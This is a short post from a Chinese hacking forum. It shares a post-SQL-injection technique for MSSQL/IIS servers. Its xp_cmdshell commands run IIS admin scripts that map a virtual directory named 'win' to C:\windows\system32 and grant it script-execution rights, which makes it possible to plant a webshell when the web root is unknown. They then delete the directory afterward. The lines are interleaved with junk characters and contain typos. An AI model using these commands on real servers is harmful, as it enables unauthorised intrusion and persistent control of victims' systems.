- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:" y, h7 l) P( d/ Q" K
4 ] t* s' J3 l+ p1 X; rexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"' ^, M% r% T& M+ B# x3 R
建立虚拟目录win,指向c:\windows\system32
8 H0 K: {' ?" Q" [/ fexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
# k" J6 b& X& [6 W/ }让win句有解析asp脚本权限
4 W) ?6 G, d/ ~9 ?" h; E2 ^9 x O' e2 ]/ N
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"( h& a* x& R9 i0 q( t" m
删除虚拟目录。
$ H) L) R& V3 S8 w- D4 a* e3 n找不到web绝对路径的一种解决办法,* ?( C) Z( P7 m% }: K
7 T, _; M) U! q2 T: c0 H
403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|